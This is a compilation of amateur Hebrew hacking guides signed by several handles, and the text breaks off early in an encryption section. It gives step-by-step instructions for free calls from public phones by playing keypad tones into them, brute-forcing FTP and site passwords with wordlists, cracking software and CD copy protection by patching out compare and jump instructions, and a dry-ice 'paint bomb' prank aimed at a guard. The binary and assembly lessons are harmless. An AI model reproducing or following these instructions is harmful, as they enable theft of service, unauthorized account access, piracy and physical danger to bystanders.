‫אני רוצה להתקשר לחבר שלי ! ואני לא רוצה להוציא שיחה מהפלאפון שלי כי זה עולה כסף !!‬
‫ואין לי הרבה טוקמן ! או שאני דיברתי יותר מידי החודש ! זה לא משנה ! העיקר שזה חינם !‬
‫מצרכים‪:‬‬
‫פלאפון מהסוגים הבאים נוקיה }משחקים בדוק{‬
‫סמסונג ! ועוד אני בדקתי על הסוגים האלה !‬
‫הפעולה‪:‬‬
‫אז עכשיו נלמד איך בדיוק עושים זאת !!‬
‫הולכים לטלפון ציבורי }רק על זה בדקתי{ ומצמידים את הפרסקת של הפלאפון לפומית של הטלפון‬
‫הציבורי ! ומתחילים לחייג את המספר בפלאפון ! אבל לא לחייג כי זה יעלה לכם כסף !‬
‫אז פשוט ללחוץ את המספר‬
‫דוגמא ‪ :‬המספר של חבר שלי הוא ‪ 12345‬נגיד טוב ! אז ככה אני מצמיד את הבפרסקת }מאיפה‬
‫ששומעים{ של הפלאפון שלי !! לאיפה שמדברים בטלפון הציבורי ! ואני מתחיל לחייג את המספר שלו‬
‫‪ 1234‬ולא לוחץ ‪send‬‬
‫בשום אופן כי אז זה יעלה כסף ! אבל ברגע שאני רושם את המספר והטלפון ציבורי שומעה את‬
‫המספרים ! והוא מתחיל לחייג ! יש טלפונים ציבורים ! שזה לא עובד עליהם זה מחייג אתה יכול‬
‫להגיד מילה ‪ 3‬שניות וזה מנתק אבל יש טלפונים שזה חופשי !!! אז מנצלים }חורשים עליו{‬
‫ליד הבית שלי אין טלפון כזה אבל יותר רחוק מצאתי טלפון ! רובם לא עובדים אבל יש גם שכן וזה‬
‫שווה ! אז תיהנ‪!!! ‬‬
‫]‪by milki [i.c.f‬‬
‫‪...‬הוספה‬
‫השיטה עובדת גם על טלפונים עם מטבעות ‪ ( .‬כאלה שיש בחנות ‪ ,‬בבתי חולים ‪ ,‬בבית ספר ועוד‪)...‬‬
‫‪ .‬עושים אותו דבר מצמידים את הפלאפון לוחצים מספרים וזה מחייג‬
‫]‪by old-hacker[i.c.f‬‬
‫כוח ברוטלי‬
‫שלום לכולם ‪ .‬זה אני‪.old-hacker‬‬
‫‪ .‬תמיד חלמתם להריץ סיסמאות (‪ 010110‬כמו בסרטים ) וזה בדיוק מה שזה כוח ברוטלי‬
‫עם כוח ברוטלי אפשר לפרוץ לכל מקום באינטרנט ‪ :‬אתרים ‪ ,‬אי מאיילים ‪ ,‬אי סי קיו ‪ ,‬מירק ועוד ‪...‬‬
‫‪(...(.‬פשוט הכל‬
‫טוב אז ככה ‪ -‬כוח ברוטל י היינו שיטה אשר מנסה לגלות את הסיסמא של דבר מסוים ע"י צירוף של‬
‫‪ .‬כמה מספריים \ אותיות‪ +‬ניסיונות רבים ‪ -‬חוזרים ונשנים‬
‫למשל ‪ :‬אם אני רוצה לפרוץ ל ‪...(ftp‬של אתר שקוראים לו זזז ( סתם‬
‫‪ :‬אז הכתובת‬
‫‪ftp.zzz.com‬‬
‫וה ‪ user name‬יהיה לרוב ‪:‬‬
‫‪root in unix\linux server‬‬
‫‪admin or administrator in nt\2k server‬‬
‫‪ ...‬ואת הסיסמא תנו לתוכנת כוח ברוטלי לחפש‬

‫התוכנה שאני הכי אוהב לכוח ברוטלי היא*‪ brute force‬שאפשר‬
‫‪.‬להוריד אותה באגף ההורדות באתר שלי‬
‫‪ :‬טוב לתוכנה יש שתי אפשרויות של חיפוש‬

‫‪word list‬‬
‫‪brute force‬‬
‫מה זה‪?word list‬‬

‫זה ניסיון פריצה בעזרת מילונים שזה קובץ עם מספר רב של מילים שמנהל האתר אולי חשב עליהם‬
‫‪ ...‬כסיסמא‬
‫אפשר להשיג כאלה המון באינטרנט למשל קובץ של ‪ 20‬מגה שנפתח ל‪ 80‬מגה רק של מילים ( אני‬
‫‪ (.‬משתמש רק בו ‪ ...‬הכי טוב‬
‫‪http://hackersclub.com/km/files/password_cracker/wordlists/hh_dictall.zip‬‬
‫מה זה‪burte force‬‬
‫זוהי פונקציה שאומרת למחשב להתחיל להריץ סיסמאות ‪ ...‬זה מחיל ב‬
‫‪aa‬‬
‫‪ab‬‬
‫…‪ac‬‬
‫‪ .‬וככה זה ממשיך עד שזה מוצא את הסיסמא‬
‫אני ממליץ להשתמש במילונים משום שיש שם את המילים הנפוצות ביותר ‪(..‬וגם בגלל שאני*‬
‫‪...(.‬משתמש בזה‬
‫]‪by old-hacker [i.c.f‬‬
‫פצצת צבע‬
‫‪ :‬מצרכים‬
‫( צבע והרבה ‪ -‬מומלץ להתחלק במחיר עם כמה חברים ‪( ...‬ולדלל עם מים כדי שיצא יותר צבע‬
‫(לבוש ישן (מומלץ שחור‬
‫חוש התמצאות‬
‫מומלץ חברים‬
‫קרח יבש‬
‫לבוא יום אחד ולארגן ‪ 5‬חברים שכל אחד מביא כמה כסף וקונים צבע ( תיקנו את הכי זול שיש)‬
‫לוקחים מים ומערבבים עם הצבע ‪ .‬בבקר למחרת באים ושמים את הצבע בפח מקרבים אותו לשומר‬
‫ושמים את הקרח היבש בפנים … ואז צועקים " פצצה " ובורחים משם מהר ואז יש ספלאש‪...‬‬
‫‪by cool-guy && blackdeath && old-hacker‬‬

‫המדריך ל‪ cracker‬המתחיל \‪zeos /‬‬
‫===========================‬
‫תוכן עניינים‪:‬‬
‫=============‬
‫א‪.‬מבוא‬
‫ב‪.‬מה זה פיצוח‬
‫ג‪.‬מטרות הפיצוח‬
‫ד‪.‬חוקיות‬
‫ה‪.‬ידע נדרש‬
‫ו‪.‬ידע חובה‬
‫ז‪.‬כלים נפוצים למפצח‬
‫ח‪.‬הורדת הכלים‬
‫ט‪.‬תודות‬
‫א‪ .‬מבוא‬
‫=======‬
‫לפני שאני ימשיך עם המדריכים המורכבים יותר כתבתי את המדריך הזה שכולל בתוכו דברים שכל‬
‫מי שרוצה‬
‫להיות מפצח צריך לדעת וגם תוכנות שונות שצריך להשיג ומאיפה להשיג‪.‬‬
‫}הערה‪ :‬סוג הפיצוח שמדובר הוא פיצוח תוכנות ולא אתרי אינטרנט או משהו אחר אם חשבת{‬
‫ב‪ .‬מה זה פיצוח‬

‫==============‬
‫לפצח זה להתעלות על מערכות הגנה (הכוונה לתוכנות בד"כ במדריכים שלי) ולנתב אותם לכל צורך‬
‫שאתה רוצה‪ .‬או לשנות כל דבר במחשב כך שיפעל כמו שאתה רוצה‪.‬‬
‫ג‪ .‬מטרות הפיצוח‬

‫===============‬
‫נגיד והורדת תוכנה אבל ‪ ,‬התוכנה מוגבלת ל ‪ 30 -‬יום ‪ ,‬מה תעשה? או שתקנה אותה (דבר שקורה‬
‫לעיתים נדירות מאוד) או שבמקרה של המפצח תפצח אותה‪ .‬כלומר תעשה שהיא תהפוך להיות‬
‫מוגבלת ל ‪40‬‬
‫יום או משהו כזה‪ ,‬דבר שלא אפקטיבי כל כך או שבכלל אפילו תשתק אותה ככה שהיא לא תהיה‬
‫מוגבלת‬
‫לשום ימים‪ ,‬בקיצור ‪ -‬לחסל לה את מנגנון ההגנה (מועה עה עה עה עה עה!!!! ‪):‬‬
‫עוד דוגמא למה אפשר לעשות עם פיצוח היא נגיד והורדת קובץ ‪ zip‬אבל אתה מגלה שאין לך סיסמא‬
‫אליו‪ ,‬אם תפצח את ההגנה שלו תוכל לקבל מהקובץ עצמו את הסיסמה הנכונה‪ .‬ולא רק לקובץ ‪zip‬‬
‫אלא‬
‫גם למלא סוגים אחרים של סיסמאות מ ‪ word‬ועד לסיסמא של הפנטגון ‪):‬‬
‫הדבר הכי נחמד לדעתי (למרות שהוא לא דורש תחכום רב) שאפשר לעשות עם פיצוח היא להכין‬
‫טריינרים ‪ trainers‬למשחקים‪ .‬מה‬
‫זה אומר ? נגיד אתה משחק במשחק כלשהו ואין לך כוח להפעיל קודים‪ .‬אתה מפעיל את הטריינר‬
‫שזאת‬
‫תוכנה שבעצם מפעילה מעיין קודים בשבילך‪ .‬הרבה מפצחים בונים טריינרים וכי חשוב לציין כי מי‬
‫שרוצה לתכנת טריינרים חייב לדעת לתכנת בשפות אחרות כדוגמת ‪ vb‬או ‪ c++‬או להשתמש ביוצר‬
‫טריינרים (פחות מומלץ) ‪.‬‬
‫נגיד קיבלת איזה דמו ‪ demo‬ממגזין משחקים או מה שלא יהיה‪ .‬במרבית הדמואים הם בעצם‬
‫משחקים מלאים! וכל מה שאתה צריך‬
‫זה קצת לשחק עם ההגדרות שלהם בעזרת פיצוח ו‪-‬וואלה! יש לך משחק מלא ‪.‬‬
‫אוקיי‪ ,‬דוגמה אחרונה למה שאפשר לעשות עם פיצוח היא נגיד שאתה בא למחשב של חבר שלך ורוצה‬
‫להוציא כל סיסמה שיש עליה **** (כמעט כל סיסמא) ‪ ,‬אז אתה חושב לעצמך ‪" -‬אם רק יכולתי‬
‫לראות‬
‫מה יש מאחורי ה **** " באמצעות פיצוח תוכל "לשלוף" את הסיסמא בקלות מתוך הכוכביות ואפילו‬
‫יותר‪...‬‬
‫אני יכול לתת לך עוד שמונת אלפים ארבע מאות דוגמאות אבל אני מאמין שתפסת את העיקרון‪...‬‬
‫ד‪ .‬חוקיות‬
‫=========‬
‫פיצוח אינו חוקי‪ .‬כי אתה עובר על זכויות יוצרים וכו' ‪ ,‬אבל אם אתה לוקח על עצמך את הסיכון‬
‫שיתפסו אותך (מאוד נדיר) אז סבבה‪ .‬אני מאמין שכל מה שאתה עושה במחשב שלך הוא עניינך בלבד‬
‫וכל עוד‬
‫לא תמכור אותו או תשווק אותו הוא נחשב לדי חוקי‪ ,‬אבל החוק לא כזה‪)0: ...‬‬
‫ה‪ .‬ידע נדרש‬

‫===========‬
‫לא כל אחד יכול לפצח‪ .‬אם אתה נהנה לצ'טט באינטרנט ולשחק במחשב אולי עדיף שתלמד משהו‬
‫אחר‪.‬‬
‫מי שרוצה להיות מפצח חייב שיהיה לו ידע באלגוריתמיקה כלשהיא (הכוונה לשפת תכנות) ‪ ,‬אני לא‬
‫מתכוון‬
‫לשפת תכנות בסיסית מאוד כמו ‪ qbasic‬אלא מהשפות היותר מתקדמות כדוגמת ‪ vb‬או ‪ c++‬אפילו‬
‫פסקל תתפלא‬
‫או לא יכולה לעזור לך ביסודות הפיצוח או יותר נכון ביסודות התכנות שמנחים את הפיצוח‪.‬‬
‫כשאני מדבר על אלגוריתמיקה אני מדבר על כל מה שקשור בלולאות‪ ,‬תנאי‪ ,‬פונקציות וכל מה‬
‫שלוגיקה ממוחשבת כוללת בתוכה‪.‬‬
‫ו‪ .‬ידע חובה!‬

‫============‬
‫אני ממליץ אחרי שיש לך ידע בשפה מסוימת או בכמה שפות להתחיל ללמוד את השפה אסמבלי‬
‫(שנקראית גם אסמבלר או בקיצור ‪)asm‬‬
‫שהיא הבסיס לפיצוח‪.‬‬
‫השפה אסמבלי היא הבסיס לכל השפות ניתן לומר מפני שהיא ממירה את התוכניות שאתה יוצר‬
‫כמעט באופן ישיר אל המחשב דבר שיעזור לך‬
‫לנתח פעולת תוכניות שונות‪( .‬מדריך על אסמבלר ניתן למצוא באתר ‪)ihc‬‬
‫ז‪ .‬כלים נפוצים למפצח‬

‫====================‬
‫אוקיי‪ ,‬בהיותך מפצח תתקל באחד מהכלים הבאים (שאני לרוב משתמש)‪:‬‬
‫*‪ - w32‬סוג של דיסאמבלר ‪ -‬דיסמבלאר הוא כלי שנותן לך לראות את קוד התוכנית אותה אתה מנתח‬
‫בשפת אסמבלי‪ .‬משתמשים בדיסאמבלר‬
‫‪ w32‬בד"כ אם כי אני מאמין כי דיסאמבלרים אחרים כדוגמת זה של ‪ borland‬גם יכולים להיות‬
‫טובים‪.‬‬
‫*‪ - hworks‬נקרא גם בשם ‪ , hw‬כלי זה מציג את התוכן של קובץ בבסיסים הקסדצימליים (בסיסי ‪)16‬‬
‫‪ ,‬לעוד פרטים על הבסיס‬
‫ההקסדצימלי קרא את המדריך שלי על "בסיס הקסדצימלי שנמצא ב ‪ ihc‬או קרא מכל מקום אחר‪.‬‬
‫דוגמא לעוד עורך הקסדצימלי טוב‬
‫חוץ מ ‪ hworks‬הוא ‪. axe‬‬
‫*‪ - softice‬כלי זה הדיבאגר ‪ ,‬החזק מבין כולם כנראה ‪ -‬נותן לך תצוגה "חיה" של הקובץ אותו אתה‬
‫מנתח באסמבלי ‪ ,‬כלומר הוא נותן לך‬
‫לבדוק תוך כדי ריצה של התוכנית מה קורה שם‪ ,‬וע"י הזנת נקודות עצירה ‪ bpx‬לתוכנית ניתן לראות‬
‫שיגרות חיוניות שיעזרו‬
‫לך להוציא את מה שאתה רוצה מהתוכנית‪.‬‬
‫אני אישית לא משתמש ב ‪ soft ice‬כי היא עושה לי בעיות ‪ ,‬אבל רוב המפצחים משתמשים בה ואולי‬
‫גם אני יעבור‬
‫לדיבאגר הזה בחזרה (פעם השתמשתי בו‪ . )...‬חוץ מהדיבאגר הזה תוכל להשתמש גם בדיבאגרים‬
‫כדוגמת ‪ pc-watch‬או ‪ trw‬שנחשבים‬
‫לדיבאגרים מצוינים וכן לעוד הרבה רבים‪...‬‬
‫*מפצח משחקים ‪ - game cracker‬מוכר פחות למפצחים ‪ ,‬כלי זה נותן לך להוציא ממשחק מחשב‬
‫מסוים נקודות ערכים חשובות‪,‬‬
‫כדוגמאת ‪ :‬נקודות חיים‪ ,‬יריות וכו' הוא עוזר בבניית ‪ trainers‬ונותן למפצח את כל המידע לגבי נתוני‬
‫המשחק‪.‬‬
‫מפצח משחקים נמצא (לפחות שלי) בתוך אחד ה ‪ trainers‬שהורדתי‪ ..‬ברגע שאכתוב מדריך על‬
‫טריינרים (מדריך ענק) אכתוב גם‬
‫איפה למצוא את מפצח המשחקים ומה ניתן לעשות איתו‪.‬‬
‫*יוצר פאטצ'ים ‪ - patch creator -‬בזה משתמשים כדי ליצור קראק (קובץ שמשנה את ההגנה של‬
‫תוכנה מסוימת) ‪ .‬אם‬
‫ברצונך ליצור קראק משל עצמך אתה צריך את התוכנה הזאת כי היא יותר נוחה‪ ,‬אם כי יש מפצחים‬
‫שבונים ללא שום יוצר פאטצ'ים‪.‬‬
‫ח‪ .‬הורדת הכלים‬

‫==============‬
‫כל אתר קראקינג שמכבד את עצמו ישים את הכלים האלה‪ .‬נכון לעכשיו ניתן למצוא את הכלים‬
‫באתר ‪ihc - www.ihc-net.org‬‬
‫או שפשוט לכו למנוע חיפוש ותקישו ‪. cracking‬‬
‫אפשר גם להוריד את רוב התוכנות ויותר באחד מהאתרים האלה ‪ http://hackersclub.com :‬או‬
‫‪www.crackstore.com‬‬
‫‪by zeos‬‬
‫אסמבלר למפצח‬
‫=============‬
‫שלום לכולם זהו המדריך הראשון שלי בנושא פיצוח במדריך תמצא פקודות בסיסיות‬
‫באסמבלר שיעזרו לך להבין מה קורה בתוכנה שאתה מנסה לפצח‬
‫‪call‬‬
‫‪----‬‬
‫משמש‪ :‬קריאה לכתובת‬

‫פעולה‪ :‬קורא לפונקציה בכתובת "הכתובת"‬
‫דוגמא ‪call 10284312 :‬‬
‫אחרי הקריאה לפונקציה התוכנית תמשיך לשורה הבאה‬
‫‪cmp‬‬
‫‪---‬‬
‫פעולה‪ :‬השוואה כלשהי בתוכנית למשל השוואה בין הסריאל שאנחנו הכנסנו לסיראל‬
‫של התוכנית‪ ,‬בדיקה אם התוכנית רשומה‬
‫דוגמא ‪cmp ax,03h :‬‬
‫בדרך כלל תמצא קפיצה כלשהי אחרי ההשוואה‬
‫‪jmp‬‬
‫‪---‬‬
‫פעולה‪ :‬הפקודה הזאת די דומה ל ‪ goto‬היא קופצת למקום כלשהו בתוכנית‬

‫דוגמא ‪jmp 00402011 :‬‬
‫יש כמה סוגים של קפיצות לדוגמא‪:‬‬
‫‪ - je‬קפיצה אם הערך שווה נכון‬

‫‪ - jne‬קפיצה אם הערך שווה לא נכון‬
‫הקפיצה באה בדרך כלל השוואה (‪ )cmp‬לדוגמא‪:‬‬
‫‪ : cmp realserial,badserial‬השוואה בין הסיראל האמיתי לסיראל שלנו‬

‫‪ : jne goawaybadcracker‬קפיצה אם הסיראל שלנו לא שווה‬
‫‪mov‬‬
‫‪---‬‬
‫פעולה‪ :‬העתקת ערך של מילה מהמקור ליעד‬

‫דוגמא ‪mov ax,dx :‬‬
‫אתה תראה את הפקודה הזאת המון בתוכנית בדרך כלל זה משמש כפעולת השמה‬
‫‪ret‬‬
‫‪---‬‬
‫פעולה‪ :‬חזרה מפונקציה‬
‫דוגמא ‪ret :‬‬
‫בדרך כלל אתה תראה את הפקודה הזאת בסוף פונקציה‪ ,‬היא משמשת כחזרה לקריאה‬
‫זהו לבנתיים מקווה שעזר לכם‪.‬‬
‫המדריך נכתב על ידי‪vbman :‬‬

‫שלחו לי תגובות או שאלות ל ‪elidor86@hotmail.co.il‬‬
‫איך להפוך מספרים בינארים לעשרוניים וההפך‪.‬‬
‫בינארי ‪:‬‬
‫בינארי היא שפת מכונה שהמחשב מבין‪.‬‬

‫התחום של בינארי הם המספרים ‪.0,1‬‬
‫אתם בטח אומרים לעצמכם אז איך אני עושה מבינארי מספרים‪ ,‬אותיות רגילות‬
‫אז על מספרים במדריך הזה אני אכתוב על אותיות יותר מאוחר‪.‬‬
‫במדריך אחר‪.‬‬
‫איך אני הופך מבינארי לעשרוני‪.‬‬
‫הסבר ודוגמא‪:‬‬
‫ניקח את המספר ‪ ,00110011‬בחישוב מהיר הוא מסמל את המספר ‪.51‬‬
‫אוקי איך עשיתי את זה‪.‬‬
‫הנה היא הטבלה של הבינארי ‪ -‬במחשבים‪.‬‬
‫‪1‬‬ ‫‪2‬‬ ‫‪4‬‬ ‫‪8‬‬ ‫‪16‬‬ ‫‪32‬‬ ‫‪64‬‬ ‫‪128‬‬
‫נכניס את הבינארי מתחת‪.‬‬
‫‪1‬‬ ‫‪1‬‬ ‫‪0‬‬ ‫‪0‬‬ ‫‪1‬‬ ‫‪1‬‬ ‫‪0‬‬ ‫‪0‬‬
‫עכשיו אם יש מתחת לספרה האמיתית ‪ 0‬אז המספר שווה אפס אבל אם יש אחד אז הוא שווה כמה‬
‫שכתוב מעל ה‪.1‬‬
‫למשל‪:‬‬
‫יש אחד מעל האחד אז זוכרים ‪ ,1‬יש אחד מעל ה ‪ ,2‬זוכרים עוד ‪,2‬‬
‫וכו' עד שמגיעים ל‪.51 = 1+2+16+32 :‬‬
‫ברור ? אני אתן לכם פה תרגילים או שתיים‪:‬‬
‫‪? = 11001100‬‬
‫‪? = 00000010‬‬
‫בראשון אמור לצאת ‪.204‬‬
‫בשני אמור לצאת ‪.2‬‬
‫אני מקווה שהבנתם אם לא תקראו שוב כי זה לא ממש קשה‪.‬‬
‫עכשיו איך הופכים מעשרוני לבינארי? זה קצת יותר מסובך אבל עדיין נכנס להגדרה של קל‪.‬‬
‫ניקל את המספר ‪ 143‬ואז מה עושים ?‬
‫‪1‬‬ ‫‪2‬‬ ‫‪4‬‬ ‫‪8‬‬ ‫‪16‬‬ ‫‪32‬‬ ‫‪64‬‬ ‫‪128‬‬
‫יאללה בוא נתחיל‪ ,‬משמאל לימין‪,‬‬

‫האם ‪ 143‬נכנס בתיבה של ‪ ,128‬אם הוא גדול מ ‪ 128‬זה אומר שכן‪ ,‬אז נרשום שם אחד‪.‬‬
‫עכשיו נשאר לנו ‪.)143-128( 15‬‬
‫נמשיך‪ 15 ,‬נכנס ב ‪ ,64‬לא‪ .‬נכתוב שם אפס‪ ,‬האם ‪ 15‬נכנס ב ‪ ,32‬גם לא‪ ,‬נשאיר שם אפס‪.‬‬
‫‪ 15‬לא נכנס ב ‪ ,16 -‬אז נכתוב גם שם ‪.0‬‬
‫‪ 15‬נכנס ב ‪ ,8‬כן אז נכתוב שם אחד ונשאר לנו ‪. )15-8( 7‬‬
‫‪ 7‬נכנס ב ‪ ,4‬כן נכתוב אחד ונשאר לנו ‪)7-4( 3‬‬
‫‪ 3‬נכנס ב שתיים‪ ,‬כן נכתוב שם אחד ונשאר לנו אחד (‪.)3-2‬‬
‫ועכשיו נשאר אחד והוא מתאים בול לאחד בסוף אז גם שם נכתוב ‪.1‬‬
‫איזה בינארי יצא לנו ?‬
‫‪10001111‬‬
‫הבנתם‪ ,‬אני ממש מקווה אבל אם לא אז תקראו שוב‪ ,‬כי זה נכנס למוח בפעם השנייה‬
‫‪1‬‬ ‫‪2‬‬ ‫‪4‬‬ ‫‪8‬‬ ‫‪16‬‬ ‫‪32‬‬ ‫‪64‬‬ ‫‪128‬‬
‫‪1‬‬ ‫‪1‬‬ ‫‪1‬‬ ‫‪1‬‬ ‫‪0‬‬ ‫‪0‬‬ ‫‪0‬‬ ‫‪1‬‬
‫אוקי אז עכשיו תתרגלו את זה עד שתעשו את זה בלי דף נייר ובלי מחשבון (שזה הדרך הקלה)‪.‬‬
‫‪by zeos & pirs[i]ng‬‬

‫פיצוח הגנות ‪ \ cd‬גרסה ‪1.1‬‬
‫מאת‪zeos :‬‬
‫הקדמה‪ :‬כתבתי את המדריך הזה לצורכי לימוד בלבד‪ ,‬כל נזק שיגרם למחשבך ו\או כל פעילות בלתי‬
‫חוקית שתעשה הנם על אחריותך בלבד‪ .‬אם אתה רוצה להפיק כסף מהפיצוח ע"י דרך כלשהי אנא‬
‫הפסק לקרוא!‬
‫קריאה מהנה ‪zeos -‬‬
‫אוקיי ‪ ,‬אז מה השיטה שאנחנו עובדים עליה?‬

‫בשביל לפצח ‪ , cd‬או יותר נכון את ההגנה של ה ‪ cd‬שמונעת ממך לעשות כלשהם פעולות כגון העתקה‬
‫‪ ,‬שינוי או כל דבר אחר אנחנו נשתמש בשיטה מאוד בסיסית שבעצם מנטרלת את כל פעולות‬
‫ההשוואה שבודקים את חוקיותו של הדיסק‪ .‬השיטה מאוד בסיסית ולכן גם מאוד קלה ולא כל כך‬
‫מקצועית אך היא טובה מאוד לעיתים רבות שכן לא רבים מן המתכנתים שבונים את הדיסקים‬
‫מתעניינים באבטחתם ואנחנו המפצחים נהנים מכך ‪ ):‬חשוב מאוד ‪ :‬גבה את קבצי המשחק לפני‬
‫שתעשה כל פעולה אתם ‪ -‬שימוש לא נכון יכול לגרום להרס‪.‬‬
‫כלים וידע‪:‬‬
‫למעשה‪ ,‬לא כל אחד יכול לפצח ‪ , (:‬לי לקח משהו כמו כמה חודשים טובים עד שקלטתי והצלחתי‬
‫לפצח ברמה בינונית‪ ...‬הידע שתצטרך צריך להיות כללי מאוד בתחום המחשבים ‪ :‬בסיסים ‪ ,‬תווי‬
‫אסקי אלגוריתמיקה מתקדמת‪ ...‬חוץ מזה עדיף שתלמד קצת אסמבלי שכן אסמבלי נחשבת לשפה‬
‫גבוהה מאוד ומכנים אותו גם "שפת סף" ‪ ,‬שכן היא נחשבת ל"אמא של כל השפות"‪ .‬אם יש לך את‬
‫הידע המתאים לא תתקל בכל קשיים‪...‬‬
‫במדריך זה השתמשתי בשני דברים לפיצוח ‪:‬‬
‫‪.1‬דיסאמבלר (עושה הפוך מאסמבלר ‪ -‬הופך קובץ אחרי הידור משפת מכונה לשפת אסמבלי כדי‬
‫שנבין מה קורה)‬
‫‪ .2‬עורך הקסדצימלי ‪. hworks‬‬
‫את שני אלה ניתן להשיג ברחבי הרשת‪..‬ממש לא בעיה להשיג אותם‪.‬‬
‫שלב ‪ : 1‬בדיקת הודעת הדיסק‪.‬‬

‫אוקיי ‪ ,‬הרץ את המשחק ללא הדיסק ‪ ,‬המשחק לא יעבוד (אל תבהל) ‪ ,‬אבל שים לב להודעת השגיאה‬
‫שקופצת כאשר אתה מפעיל את הקובץ ללא הדיסק ‪ .‬רשום לך אותה וזכור אותה לאחר מכן‪ .‬יכול‬
‫להיות שאתה לא חושב שהיא חשובה אבל היא חיונית מאוד למפצח‪.‬‬
‫שלב ‪ :2‬פותחים את הקובץ להסתכלות ראשונית‪.‬‬

‫אוקיי ‪ ,‬אחרי שרשמנו לעצמנו את ההודעה נעבור לדיסאמבלר ‪ w32‬ונפתח את קובץ ה ‪ exe‬שהפעלנו‬
‫בהתחלה‪ ,‬פעולה זאת לוקחת כמה זמן ‪ ,‬שתה משהו וחזור לפה ‪):‬‬
‫אוקיי ‪ ,‬זה גמר לעשות את הפעולות שלו ‪ -‬קדימה לעבודה ‪ -‬לחץ על הכפתור למעלה שכתוב עליו‬
‫‪ strn.ref‬שמפרש לנו את משפטי התוכנית כדי שנבין מה עושה כל מה (תלמד להשתמש בזה עוד הרבה‬
‫כמפצח‪ )...‬הכפתור נמצא צמוד לכפתור ההדפסה ‪ .‬או הנה עכשיו אנחנו רואים כל מיני משפטי תוכנית‬
‫שנוצרו כתוצאה מכל קוד התוכנית באסמבלי ‪ -‬עכשיו בוא נמצא את הודעת השגיאה שרשמנו‬
‫ממקודם מבין כל המשפטים ששם ‪ ,‬לחץ על המשפט פעמיים והדיאסמבלר יזניק אותך למקום שבו‬
‫נמצאת הפרוצדורה הממונה על המשפט ‪ .‬עכשיו מגיע חלק קצת קשה למי שמבין קצת באסמבלי יהיה‬
‫קל‪ :‬כפי שהוסבר למעלה המטרה שלנו זה לנטרל את כל גורמי ההשוואה בתקווה שאחד מהם ינטרל‬
‫את בדיקת החוקיות של הדיסק‪ .‬אז אנחנו צריכים למצוא בין כל המשפטים של המשפט‪ .‬את אותם‬
‫המשפטים שמורים על קריאה לפונקציה ‪ , call -‬קפיצה ‪ jmp -‬או קפיצה כאשר שווה ‪ - jne‬ואף עוד‬
‫סוג קפיצה ‪. je -‬בקיצור כל פקודה המראה על קריאה ‪ ,‬או קפיצה ‪ .‬שים לב שכאשר אתה עובר על‬
‫משפט קפיצה‪ ,‬קריאה ‪ -‬השורה תסומן בצבע ירוק‪ ,‬עכשיו כל שורה שכזאת בתוך השיגרה של ההודעה‬
‫בלבד תסתכל למטה ותראה נתונים על המשפט ‪ -‬תראה שכתוב ‪ @ offset xxxxh‬כאשר ‪ xxxx‬הוא‬
‫המספר שאנחנו צריכים ‪ -‬ללא ה ‪ . h‬כתוב כל מספר כזה שמצאת בשורות ‪ -‬אל תשכח לוודא שהשורה‬
‫הופכת להיות בצבע ירוק מתי שיש את הפקודות אותן אנו צריכים לנטרל‪.‬‬
‫שלב ‪ :3‬נטרול ההגנה‬

‫אוקיי מפה זה כבר די קל‪ ,‬צא מתוך ‪ w32‬ולך לעורך הקסדצימלי ‪ hw‬שלנו ‪ ,‬פתח את הקובץ והקש ‪f5‬‬
‫שזה ‪ - goto‬רשום את המספר הראשון והעורך יזניק אותך למקום שלו בעורך ההקסדצימלי ‪ ,‬בשלב‬
‫הזה בוא ותלמד משהו קטן ‪ :‬נגיד והמספר שרשמנו הוא ‪ 0003eb2a‬זה אומר כי יש לנו ‪ 4‬בייט ‪ -‬כל‬
‫‪ 2‬מספרים הם בייט אחד (הקסדצימלי זה בסיס ‪ 16‬ואילו בייט זה בסיס ‪ )8‬ככה שהמספר בעצם אמור‬
‫להראות כך‪:‬‬
‫‪ eb-2a-00-03‬כלומר ‪ 8 :‬מספרים = ‪ 4‬בייט‪ .‬אוקיי ‪ ,‬אחרי שתפסת את זה בוא ונמשיך‪ ...‬אחרי‬
‫שהבנת את מספר הבייטים במספר שלך ‪ -‬כתוב במקום כל זוג מספרים את המספר ‪ 90‬כלומר ‪00- :‬‬
‫‪ , eb-2a = 90-90-90-90-03‬אם יש לך עוד מספרים עשה אותו דבר לכולם ושמור את הקובץ ‪.‬‬
‫במזל טוב ואם עשית הכל נכון ‪ -‬פרצת את ההגנה של הדיסק ‪ -‬צ'פר את עצמך ושחק במשחק עד‬
‫הבוקר‪): ...‬‬
‫שלב ‪ :4‬הערות ומסקנות‬

‫אם אתה כבר פה בוא ותקשיב קצת על פיצוח‪ .‬הפיצוח שאנחנו עשינו במדריך זאת היא פריצת הגנה‬
‫שזאת הפריצה שנחשבת לאחת הקלות ‪ .‬סגנון הפיצוח הזה הוא מאוד נפוץ ואפשר לראות זאת מכיוון‬
‫שבכל מקום כמעט אפשר לקנות דיסק צרוב במעט מאוד כסף מה שדי מעציב את היוצרים החוקיים‬
‫אך מעציב גם אותנו הצרכנים שנאלצים לשלם מחיר יקר רק בגלל "שהמשחק חוקי" ולכן זאת גם את‬
‫המטרות שבפיצוח‪ .‬עוד סוג נוסף של פיצוח הוא פיצוח הסיסמאות החביב עליי‪ .‬בפיצוח הזה לוקח‬
‫המפצח תוכנה עם מגבלת סיסמא ומנסה להוציא את האלגוריתם של הסיסמא או את הסיסמא‬
‫הנכונה לנתונים מסוימים ‪ ...‬יכולה להיות קלה ויכולה להיות גם קשה מאוד ולעיתים גם קשה וכמעט‬
‫בלתי אפשרית‪.‬‬
‫מקווה שנהניתם מהמדריך ‪( zeos -‬נמצא בד"כ בשרת ‪ ivrit.co.il‬חדר ‪#‬אבטחה או ‪#‬עברית )‬
‫אם אתה מתעניין בפיצוח ורוצה להיכנס קצת יותר לעומק חפש את המילה ‪ crack‬במנועי החיפוש‬
‫השונים‪.‬‬
‫תודה רבה לאנשי ‪ hacker.co.il‬שדחפו אותי לפיצוח ‪):‬‬
‫‪by zeos‬‬
‫קידוד והצפנה‬
‫* מה זה הצפנה ?‬
‫* איך אני מצפין ?!?!‬
‫* למה זה טוב ?‬
‫* בטוח שלא יגלו את זה ?‬
‫* לינקים ‪.‬‬
‫* קרדיטים‪.‬‬
‫=============‬
‫מה זה הצפנה ?‬
‫=============‬
‫בתהליך הצפנה אתה בעצם משנה מה שאתה כתבת למשהו אחר‪ ,‬שזה נראה ממש זוועה‪ ,‬לא ברור‪.‬‬
‫אבל בעצם כל מה שכתבת נמצא שם רק זה השתנה כדי שאנשים לא מורשים (שוטרים) לא יקראו את‬
‫זה‪.‬‬
‫לכל אלגוריתם של הצפנה יש סוג הצפנה אחר‪ .‬למשל‪ ,‬התוכנה ‪ a‬איך היא מצפינה‪.‬‬
